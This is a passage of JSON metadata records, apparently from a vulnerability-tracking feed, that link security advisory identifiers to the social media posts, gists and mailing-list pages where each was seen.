"2025-09-25T13:53:59.268062Z"}, {"uuid": "45316bb2-5a24-46cd-ae95-432743681d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29cq-5w36-x7w3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114870042350039767", "content": "", "creation_timestamp": "2025-07-17T18:42:26.651321Z"}, {"uuid": "18f355d1-7979-45f8-9e15-01fc237ed837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r6h-8v6p-xvw6", "type": "seen", "source": "https://gist.github.com/deepak-chowdry/3da737fb0b4c63ed1bfe586c677e4860", "content": "", "creation_timestamp": "2025-12-02T03:16:32.000000Z"}, {"uuid": "4b7c3b15-820e-46c1-9a2b-5771e02aace1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c7rr-2h93-7gjf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115651311349715908", "content": "", "creation_timestamp": "2025-12-02T18:09:25.242874Z"}, {"uuid": "823cf5fa-968a-48ca-80b9-2f8213bba56b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "da9a6063-1e69-4778-bdf0-680fe24388b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/betterhn300.e-work.xyz/post/3lyh2ieyomt2m", "content": "", "creation_timestamp": "2025-09-10T01:12:20.931459Z"}, {"uuid": "7dba1250-f73c-4b0d-8001-00add3b3cc04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-25fr-jw29-74f9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114898122820778282", "content": "", "creation_timestamp": "2025-07-22T17:43:40.961280Z"}, {"uuid": "75b55167-7257-4468-9f26-968e96216787", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qrr7-crgj-cmh3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114899075460099073", "content": "", "creation_timestamp": "2025-07-22T21:45:57.168348Z"}, {"uuid": "a5cb2390-b9fc-411b-9a5a-f54ac7736e35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R7G-8HPC-RPQ9", "type": "seen", "source": "https://t.me/brutsecurity/2046", "content": "", "creation_timestamp": "2026-07-10T00:00:31.305258Z"}, {"uuid": "987c48d7-3c3b-4f93-888a-6a7fd9216ffc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rm8p-cx58-hcvx", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3luryssiohm2k", "content": "", "creation_timestamp": "2025-07-25T12:00:52.715317Z"}, {"uuid": "59c3533a-4731-4212-8d8a-fd0fb47a2a3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hc4-vh64-cxmj", "type": "seen", "source": "https://gist.github.com/jporzucek/063a1bfdceba2cb9dbbdc9dfbbef6ef5", "content": "", "creation_timestamp": "2025-07-25T17:22:08.000000Z"}, {"uuid": "d1ada5c6-743a-49f7-87d2-98dd4d91ced1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr5f-v2jv-69x6", "type": "seen", "source": "https://gist.github.com/jporzucek/063a1bfdceba2cb9dbbdc9dfbbef6ef5", "content": "", "creation_timestamp": "2025-07-25T17:22:08.000000Z"}, {"uuid": "5e6ea03d-368f-4914-9012-0a2ba303afad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf5p-g6vw-rhxx", "type": "seen", "source": "https://gist.github.com/jporzucek/063a1bfdceba2cb9dbbdc9dfbbef6ef5", "content": "", "creation_timestamp": "2025-07-25T17:22:08.000000Z"}, {"uuid": "4b568dd2-6b07-48ad-b254-e50596c264c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gq52-6phf-x2r6", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lutjom5oa52b", "content": "", "creation_timestamp": "2025-07-26T02:35:24.979473Z"}, {"uuid": "368b119b-3498-4eb7-b60e-93881b180113", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mwmr-4mj7-4hv7", "type": "seen", "source": "https://gist.github.com/ZupeiNie/705a606fbb99f3bb8c9b51e5bc13c91d", "content": "", "creation_timestamp": "2025-07-30T01:49:33.000000Z"}, {"uuid": "5b2f2616-680a-4e1c-bbfb-2e57f020f298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72ff-rqxp-4hrh", "type": "seen", "source": "https://gist.github.com/ZupeiNie/6f65e564f2067b876321d3dfdbb76569", "content": "", "creation_timestamp": "2025-07-30T01:53:20.000000Z"}, {"uuid": "ed9efa09-e3af-4f42-8e03-3d4d78124d49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rp3h-65jh-3c3m", "type": "seen", "source": "https://gist.github.com/ZupeiNie/cd88c827eef11a1618f8baacccd240fb", "content": "", "creation_timestamp": "2025-07-30T01:59:08.000000Z"}, {"uuid": "ec92ff08-eca7-4385-b7ab-d74829ed94c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190513-secureboot", "type": "seen", "source": "https://gist.github.com/iseki0/cde82900ce5cf723909622f903fd261b", "content": "", "creation_timestamp": "2025-07-30T03:49:44.000000Z"}, {"uuid": "ce54bbcb-8d61-4680-b22b-a130a3bfb8ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/d466a8b3769f62cf6febf2813a0358be", "content": "", "creation_timestamp": "2025-10-26T11:02:50.000000Z"}, {"uuid": "2e8a9205-96ba-4c1c-bda0-6bc203dba4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/aa079ad98c5f0cc7a81d95c8ef3f248f", "content": "", "creation_timestamp": "2025-11-11T22:51:10.000000Z"}, {"uuid": "64688137-29fe-499c-baf4-abc9c8106810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/7f41af78c530f8df689d4273e468a26c", "content": "", "creation_timestamp": "2025-10-26T11:06:50.000000Z"}, {"uuid": "b4a0a913-7d80-47a7-ace3-a7a600de325b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/7f41af78c530f8df689d4273e468a26c", "content": "", "creation_timestamp": "2025-10-26T11:06:50.000000Z"}, {"uuid": "44f7cb87-f649-4964-869d-7447104072df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/7f41af78c530f8df689d4273e468a26c", "content": "", "creation_timestamp": "2025-10-26T11:06:50.000000Z"}, {"uuid": "1d9d95ed-a66a-4a09-adc7-a61ffef9432e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/metaskills/23ceaecf2072417d8432ef394d68390b", "content": "", "creation_timestamp": "2025-10-03T00:36:12.000000Z"}, {"uuid": "814f1687-239c-4328-b994-b52c1298dcef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-049", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m5vlr4yghs2j", "content": "", "creation_timestamp": "2025-11-18T11:04:41.667693Z"}, {"uuid": "027d51e0-4b42-431a-8db5-f0eded12f83b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:1453", "type": "seen", "source": "https://gist.github.com/abdemo2/4dfcb5246872f9d78ccb82992f99a603", "content": "", "creation_timestamp": "2025-12-01T13:47:33.000000Z"}, {"uuid": "0853be24-743b-4d39-af8d-227d9e3f6976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3lvuqwk5mpz72", "content": "", "creation_timestamp": "2025-08-08T07:43:02.906883Z"}, {"uuid": "c8ce9556-ba33-4a05-b619-f2cfe8b689b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7fj8-pjw2-r9vh", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3lvuqwk5mpz72", "content": "", "creation_timestamp": "2025-08-08T07:43:03.037145Z"}, {"uuid": "85316e68-aa19-4ce0-b344-920c1d9feb27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x697-jf34-gp5x", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/115595429345717232", "content": "", "creation_timestamp": "2025-11-22T21:17:53.385060Z"}, {"uuid": "1aea7102-10e3-4c61-a703-b1be7cb8141d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x697-jf34-gp5x", "type": "seen", "source": "https://bsky.app/profile/obivan.infosec.exchange.ap.brid.gy/post/3m6apvuv2fwp2", "content": "", "creation_timestamp": "2025-11-22T21:18:34.636335Z"}, {"uuid": "0f1dcd96-0de3-49d8-a674-f50c30b82daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prrf-397v-83xh", "type": "seen", "source": "https://gist.github.com/konard/91c721c82d82d143beddafd77c787b4e", "content": "", "creation_timestamp": "2025-10-26T12:31:11.000000Z"}, {"uuid": "663249c7-0325-45c9-813a-04714387eda3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6px8-22w5-w334", "type": "seen", "source": "https://gist.github.com/konard/91c721c82d82d143beddafd77c787b4e", "content": "", "creation_timestamp": "2025-10-26T12:31:11.000000Z"}, {"uuid": "018b4662-dcec-4080-8311-dfff8652a65d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/91c721c82d82d143beddafd77c787b4e", "content": "", "creation_timestamp": "2025-10-26T12:31:11.000000Z"}, {"uuid": "2d4e54fa-165a-40f5-afd6-9e6f2dff6e6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xjx-v99w-gqf3", "type": "seen", "source": "https://gist.github.com/konard/91c721c82d82d143beddafd77c787b4e", "content": "", "creation_timestamp": "2025-10-26T12:31:11.000000Z"}, {"uuid": "9aa26808-f251-49cb-ab1e-b629c5e5be32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "b05b4d05-f680-4c7d-9cf0-0147f5cdcd4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v2c8-vqqp-hv3g", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/150", "content": "", "creation_timestamp": "2025-09-05T22:31:13.000000Z"}, {"uuid": "3cff36d7-0e35-4d4b-b079-bfc56d59b73c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fgq-fpq9-mr3g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115310405072880606", "content": "", "creation_timestamp": "2025-10-03T13:12:28.629969Z"}, {"uuid": "7ace61c2-ddde-480c-8397-f744480a0fe1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpm2-6cq5-7pq5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115384290075251866", "content": "", "creation_timestamp": "2025-10-16T14:22:23.928015Z"}, {"uuid": "6c9c9658-b1a2-439d-814f-1afd7d14983e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrhg-82w2-vvj7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115646748615003105", "content": "", "creation_timestamp": "2025-12-01T22:49:03.508125Z"}, {"uuid": "9dd2c9b5-401d-4a05-98a8-08353599f1b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-yyyy-zzzz", "type": "seen", "source": "https://gist.github.com/williamzujkowski/da899905c2905fafe74db871be75fcbe", "content": "", "creation_timestamp": "2025-11-01T15:48:50.000000Z"}, {"uuid": "643ec069-29f5-4b88-8cdd-90d8b67a2451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxxx-yyyy-zzzz", "type": "seen", "source": "https://gist.github.com/williamzujkowski/90a547307bb8d0158bcadc43b86df18f", "content": "", "creation_timestamp": "2025-11-01T15:48:49.000000Z"}, {"uuid": "c5326362-c81d-4ba2-9fa5-384784e07e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-045", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m3n34pfgb52m", "content": "", "creation_timestamp": "2025-10-20T14:55:15.574533Z"}, {"uuid": "07e1d19c-0ffe-4c33-8f1d-2542219de18d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-040", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lzgkhmqreb25", "content": "", "creation_timestamp": "2025-09-22T13:50:46.173793Z"}, {"uuid": "eaf5748f-a54b-4414-9d73-ecd89123690c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-040", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115248270209420806", "content": "", "creation_timestamp": "2025-09-22T13:50:46.948305Z"}, {"uuid": "c867a858-7be5-4ec6-adc6-120fbde45135", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5rrx-jjjq-q2r5", "type": "seen", "source": "https://gist.github.com/dhmosfunk/0b74940802f1c0e6b4e39101b301072c", "content": "", "creation_timestamp": "2025-10-24T11:40:04.000000Z"}, {"uuid": "e4f2bd8e-d21c-47de-a27c-05a8d8c9a248", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3m8r-w7xg-jqvw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115454180633459870", "content": "", "creation_timestamp": "2025-10-28T22:36:29.218320Z"}, {"uuid": "abef98bc-55f9-4563-839e-79868913e686", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rj5c-58rq-j5g5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115454183590681546", "content": "", "creation_timestamp": "2025-10-28T22:37:14.379228Z"}, {"uuid": "474de3a9-2363-44bd-a01f-a9fc776a9bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-040", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lzgmvucurt2x", "content": "", "creation_timestamp": "2025-09-22T14:34:31.229236Z"}, {"uuid": "c00af05b-be0d-46fd-b0fe-4fc5714c1c73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-573g-3567-8phg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115419816791512009", "content": "", "creation_timestamp": "2025-10-22T20:57:19.847098Z"}, {"uuid": "9299c8b2-0b28-4a7d-982e-9d2b533018f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-041", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lzy2wyuzsc2o", "content": "", "creation_timestamp": "2025-09-29T13:00:57.618641Z"}, {"uuid": "6037204c-2897-453f-87de-b8b98ca146f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8h43-rcqj-wpc6", "type": "seen", "source": "https://bsky.app/profile/o.ee/post/3m45qzt7xd22k", "content": "", "creation_timestamp": "2025-10-27T06:09:59.255030Z"}, {"uuid": "63d81459-51c1-4f0a-8100-4acc1e43c91c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xr5-732g-84px", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021778727232469", "content": "", "creation_timestamp": "2025-08-13T13:50:59.997166Z"}, {"uuid": "6dc0af47-8989-49f2-a778-0162293bed2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjp6-9cvg-8w93", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021780280718785", "content": "", "creation_timestamp": "2025-08-13T13:51:23.636908Z"}, {"uuid": "8750ac59-e08b-4a08-ab4c-cb66bb56f8a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cjc8-g9w8-chfw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021938966211903", "content": "", "creation_timestamp": "2025-08-13T14:31:45.221537Z"}, {"uuid": "f5f59bdb-ed55-4922-b41f-1e3535bafd09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v393-38qx-v8fp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021938966211903", "content": "", "creation_timestamp": "2025-08-13T14:31:45.301189Z"}, {"uuid": "d425a68e-5c12-463c-93c5-fe80dd0564ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qp29-wxp5-wh82", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021944858201050", "content": "", "creation_timestamp": "2025-08-13T14:33:15.036892Z"}, {"uuid": "93774a7c-aeaa-4002-9fb1-503128e901cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6hgw-6x87-578x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021944858201050", "content": "", "creation_timestamp": "2025-08-13T14:33:15.133850Z"}, {"uuid": "1eb5e8b4-648f-41c0-bc67-336e55d41b23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-prj3-ccx8-p6x4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115021950530102944", "content": "", "creation_timestamp": "2025-08-13T14:34:41.631282Z"}, {"uuid": "09251f38-a343-488b-ba8e-1e28d6101630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-527m-2xhr-j27g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115334729215922895", "content": "", "creation_timestamp": "2025-10-07T20:18:25.655929Z"}, {"uuid": "ad829892-090e-4672-af4a-554233682323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-042", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m2jlpjxrys2o", "content": "", "creation_timestamp": "2025-10-06T12:16:16.431604Z"}, {"uuid": "355e44b6-123d-4c69-876f-f3f0f131272c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-042", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115327170971965048", "content": "", "creation_timestamp": "2025-10-06T12:16:19.800184Z"}, {"uuid": "4897345d-063e-48c2-a705-734244a33222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9x9c-ghc5-jhw9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115033509822272775", "content": "", "creation_timestamp": "2025-08-15T15:34:22.458275Z"}, {"uuid": "b355725a-f3a7-4f48-b260-621bbe3daf84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xrg4-qp5w-2c3w", "type": "seen", "source": "https://bsky.app/profile/raptor.infosec.exchange.ap.brid.gy/post/3lwh7lwnkcrv2", "content": "", "creation_timestamp": "2025-08-15T15:53:30.494858Z"}, {"uuid": "c9e4342a-bc7f-4ee7-9544-51bcb7987ae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xrg4-qp5w-2c3w", "type": "seen", "source": "https://infosec.exchange/users/raptor/statuses/115033584397389086", "content": "", "creation_timestamp": "2025-08-15T15:53:34.146058Z"}, {"uuid": "38c8c76d-7df9-4a00-bfad-d29c27e30ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95pq-gj5v-4fg2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115051011155934268", "content": "", "creation_timestamp": "2025-08-18T17:45:11.494946Z"}, {"uuid": "3cea7e97-7f32-4b63-a1ee-9b22591a86f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrpp-h998-j3pp", "type": "seen", "source": "https://gist.github.com/aliberson/69883d97687f64850e2fa92493026b01", "content": "", "creation_timestamp": "2025-11-10T06:06:01.000000Z"}, {"uuid": "824799ee-0d4d-40a0-b31b-915934401979", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vhc2-fjv4-wqch", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115494066188195772", "content": "", "creation_timestamp": "2025-11-04T23:39:54.655905Z"}, {"uuid": "a8e91034-b8d3-4cca-85a7-ff685a70e242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2jr2-8wf5-v6pf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115494066188195772", "content": "", "creation_timestamp": "2025-11-04T23:39:54.895492Z"}, {"uuid": "eff1ca97-0a0e-4d24-8765-e1b56bb1833a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-049", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m5tkmqswxg2j", "content": "", "creation_timestamp": "2025-11-17T15:39:01.399724Z"}, {"uuid": "bc0f7c1f-01e4-4200-8ccd-cb908955650a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-049", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115565785255081520", "content": "", "creation_timestamp": "2025-11-17T15:39:04.232879Z"}, {"uuid": "caf813d3-37ac-4641-aad5-0f947c6d9e35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w832-gg5g-x44m", "type": "seen", "source": "https://gist.github.com/Ochyro/47b7b222c6ca5445d317dbcf46c47d39", "content": "", "creation_timestamp": "2025-11-10T09:28:07.000000Z"}, {"uuid": "30deecf3-d605-4d21-9811-69e512927b0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rxc4-3w6r-4v47", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115067332741639762", "content": "", "creation_timestamp": "2025-08-21T14:55:59.149222Z"}, {"uuid": "903542ce-136a-4bcf-94b2-5f45853291dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8hmm-4crw-vm2c", "type": "seen", "source": 